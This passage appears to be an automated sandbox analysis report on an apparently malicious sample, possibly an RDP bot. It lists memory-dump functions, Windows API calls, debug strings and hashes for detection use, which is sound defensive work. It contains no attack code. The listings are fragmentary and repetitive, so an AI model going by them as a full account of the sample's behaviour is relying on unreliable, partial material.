RegCloseKey.ADVAPI32 ref: 00007FFE0EB4364D

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

Strings

registry_get_value, xrefs: 00007FFE0EB43696
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4369D

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: dfbb4f9ddf86c67bc9452ba10506b9c36b23fa37de77fcab18f2c0343cb3c22c
Instruction ID: ee2c02650b6c6a3645862d79e512d09d4ab11ffc2213c36e4f641fa66cbc6247
Opcode Fuzzy Hash: dfbb4f9ddf86c67bc9452ba10506b9c36b23fa37de77fcab18f2c0343cb3c22c
Instruction Fuzzy Hash: 93F09663A0874641E6739F00B84037A6694FF447A4F480135DD9D466A0DF3DE9899B00

Function 00007FF6EF659467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF6EF65950D

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6EF65955D
registry_get_value, xrefs: 00007FF6EF659556

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: a8c982191d65127c18dc38158ca147da0647e8f512e2d4d5e39173e2e083c8cc
Instruction ID: 378acd1066a36744eaa10337bc6e77005615705371108ecc8e08f7bbfb0cd52e
Opcode Fuzzy Hash: a8c982191d65127c18dc38158ca147da0647e8f512e2d4d5e39173e2e083c8cc
Instruction Fuzzy Hash: B6F0F62371834643E5528F00BC403B6235CAF40794F090636ED1DD6691EF2ED989B309

Function 00007FF6EF65945D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF6EF65950D

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6EF65955D
registry_get_value, xrefs: 00007FF6EF659556

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 38827ecdbc6ec64caf77c70bcdd3837f56e806133f37bc576c4cf501232a091f
Instruction ID: 7f3f3071f0c98a51b1dfd9c9e1ea7467be948a0efcca90309adcdc8c5a752bfb
Opcode Fuzzy Hash: 38827ecdbc6ec64caf77c70bcdd3837f56e806133f37bc576c4cf501232a091f
Instruction Fuzzy Hash: 33F0F62371834643E5528F00B8403B6235CAF40798F090636ED1DD6691EF2ED989B309

Function 00007FF6EF6594FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF6EF65950D

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6EF65955D
registry_get_value, xrefs: 00007FF6EF659556

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: a12f8c7c9d0ae38e3aa8161ea9d6e2f4a0f28f07b01cfff420fb9ff4fdbfa24f
Instruction ID: 315241aefcfd13bf3b1a2729b1cbe686c28019a51135f98ffd7eea888943a12b
Opcode Fuzzy Hash: a12f8c7c9d0ae38e3aa8161ea9d6e2f4a0f28f07b01cfff420fb9ff4fdbfa24f
Instruction Fuzzy Hash: A0F0F62371834643E5528F40B8403B6635CAF40798F090636ED1DD6691EF2ED989B309

Function 00007FF6EF6594EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF6EF65950D

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6EF65955D
registry_get_value, xrefs: 00007FF6EF659556

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 70ee9f1628cd32528672a16dc1e08cc8e1899a034b130429669a1e0cc08a25bc
Instruction ID: 99c7a8884d97c4de0742207dd534f2c968bae8e5fd76ed53bdaef675d8de78d2
Opcode Fuzzy Hash: 70ee9f1628cd32528672a16dc1e08cc8e1899a034b130429669a1e0cc08a25bc
Instruction Fuzzy Hash: E9F0F62371834643E5528F00BC403B6235CEF40798F090636ED1DD6691EF2ED989B30A

Function 00007FF6EF659578 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF6EF65950D

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6EF65955D
registry_get_value, xrefs: 00007FF6EF659556

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: f133ba84cc020c5393658f7875ae71ba30ec1ba0e9edcda9ee4f306665495cec
Instruction ID: e2cf5ca869671d63f371e10acde84cf5086090999ce31cbddd8cdf83364e99c7
Opcode Fuzzy Hash: f133ba84cc020c5393658f7875ae71ba30ec1ba0e9edcda9ee4f306665495cec
Instruction Fuzzy Hash: E3F0F62371834643E6528F00B8403B6235CAF40798F090236ED5DD6691EF2ED989B309

Function 00007FFE0E13135A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE0E13143B
Sleep.KERNEL32 ref: 00007FFE0E131447

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
Instruction ID: 98d8a2ee4d69c00875affee25663e4f075d63f9e5ea8d792c5aea739bc5efc5f
Opcode Fuzzy Hash: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
Instruction Fuzzy Hash: EB31F361B0D702A2FA709B74E88527C7252AF44770F600737D4FD46BF1DE2DA9859640

Function 00007FFE126D605A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE126D613B
Sleep.KERNEL32 ref: 00007FFE126D6147

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: f41a2fd7c2c62fd8492a237bcc7c73a49ed62abef21106d16d4f36e0309278c3
Instruction ID: d33e50599776f7e6110c4612e0a0d131d13a3e55a43f6c52a9741447e194bcfa
Opcode Fuzzy Hash: f41a2fd7c2c62fd8492a237bcc7c73a49ed62abef21106d16d4f36e0309278c3
Instruction Fuzzy Hash: A1311D20E08E4A97F730DB2BAC442792252AF44378F5407F2D4BD466F6CEEDA9595680

Function 00007FFE11EC26DA Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE11EC27BB
Sleep.KERNEL32 ref: 00007FFE11EC27C7

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
Instruction ID: 45cc18ac62ce454df7f41ca89c3f793da20e04537aeae1d842ef554530e466ce
Opcode Fuzzy Hash: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
Instruction Fuzzy Hash: 0F31FB24B08E4382FB2067E7AC8437B2259AF44770F9017B2E47D866F5DE2DF585A740

Function 00007FFE0E16A31A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE0E16A3FB
Sleep.KERNEL32 ref: 00007FFE0E16A407

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
Instruction ID: 985b0f9191f52c4cc7e640f096d0fbf7d623e228967b429182880ec430768fda
Opcode Fuzzy Hash: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
Instruction Fuzzy Hash: C531FE20E1C60382F6309729E88427D36A2AF45B74F540337D5FE566F7DE3CE9859682

Function 00007FFE0EB4135A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE0EB4143B
Sleep.KERNEL32 ref: 00007FFE0EB41447

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
Instruction ID: 48dee5e40e92d93aebfb5a3facd0858004955c0ddc495db2b545ac99b7d0b86b
Opcode Fuzzy Hash: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
Instruction Fuzzy Hash: E53106A1E0E70392F6309F2CE8853792261EF44774F640735E4FD46AF5DE2CAA859E40

Function 00007FF6EF6519E2 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF651FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6EF65162F), ref: 00007FF6EF651FEE

SleepEx.KERNEL32 ref: 00007FF6EF651A51

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: HandleModuleSleep
String ID:
API String ID: 1071907932-0
Opcode ID: c8c003f471b71a30b05e0dbd92c2347c511595d06f4733816d1c0ed97604998d
Instruction ID: 1c059dbebaafef6c51a35a43a3bef2ba5e7445acdd82937ce1ec09fe621c419a
Opcode Fuzzy Hash: c8c003f471b71a30b05e0dbd92c2347c511595d06f4733816d1c0ed97604998d
Instruction Fuzzy Hash: 4B01F43371C24383F7911694E4503B923BBAB84344F941831E64EDB2C7DE6ED845A306

Function 00007FF6EF651360 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetServiceStatus.SECHOST ref: 00007FF6EF651385

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-0
Opcode ID: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
Instruction ID: 567d902418f02395609d24bf09e30ff29b144daac4d1a341ed10a5618793f3e6
Opcode Fuzzy Hash: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
Instruction Fuzzy Hash: A8D05276D2A602C7E3049F15FCA022033ACBF89380FC48835D00CE2231CE7E612CAB0A

Function 00007FF6EF65862A Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

rand_s.MSVCRT ref: 00007FF6EF65863B

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: rand_s
String ID:
API String ID: 863162693-0
Opcode ID: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
Instruction ID: c6c13925085424f811da922a4a72365e3b954429cccee3e1add44de2f1076e6a
Opcode Fuzzy Hash: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
Instruction Fuzzy Hash: 86C00226A185408BD6209B24E85535AA774E798308FD04111E65D92665CA3CD61ECF15

Function 00007FFE0E138F37 Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E138F45

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
Instruction ID: 240e7abc2dee4fc4e094993725ad4719956a87e90d520f847e82c152b5c12ae3
Opcode Fuzzy Hash: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
Instruction Fuzzy Hash: 03C04CD2F1960682FB18ABB5B89503512309F9C715F041037E9DE863B29E5C58D94A44

Non-executed Functions

Function 00007FFE133857B3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FFE133857F9
strcpy.MSVCRT ref: 00007FFE13385814
FindFirstFileA.KERNEL32 ref: 00007FFE133858E7
GetLastError.KERNEL32 ref: 00007FFE13385903
GetLastError.KERNEL32 ref: 00007FFE13385932
FindClose.KERNEL32 ref: 00007FFE13385950

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

(path != NULL), xrefs: 00007FFE13385849
fs_dir_list, xrefs: 00007FFE13385850, 00007FFE13385888, 00007FFE133858C0, 00007FFE1338591D, 00007FFE13385961
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13385857, 00007FFE1338588F, 00007FFE133858C7
(name != NULL), xrefs: 00007FFE13385881
(resume_handle != NULL), xrefs: 00007FFE133858B9
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FFE13385924
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FFE13385968
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13385842, 00007FFE1338587A, 00007FFE133858B2

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-1535167640
Opcode ID: 0c117dcf1b70b1ca6de5697b93cfccb7d8ae4961e298b13878a12c35d7c12fc5
Instruction ID: 7be3e1d8605963c6cd38b635c6e4a13ab8266dab1b6d574e195fcf31181c8c02
Opcode Fuzzy Hash: 0c117dcf1b70b1ca6de5697b93cfccb7d8ae4961e298b13878a12c35d7c12fc5
Instruction Fuzzy Hash: E5612A21E0CD47CEFA605A16A4403BD26516B303B4F5443F2D97EBBAF8DE6CA9C58349

Function 00007FFE1339B7E8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eddfeba3403210edebded81f2e7352dbb37a411731a4da1b037d3eac54097d24
Instruction ID: 43b69ae400987c27d8c58f9eff5c218fac3db41f9f8344595667033fe4b3fc8c
Opcode Fuzzy Hash: eddfeba3403210edebded81f2e7352dbb37a411731a4da1b037d3eac54097d24
Instruction Fuzzy Hash: B7D05E83E9DAC25DF2670A354C211192E915BB2B24BCE81BAE66D4A3E3E85C58008219

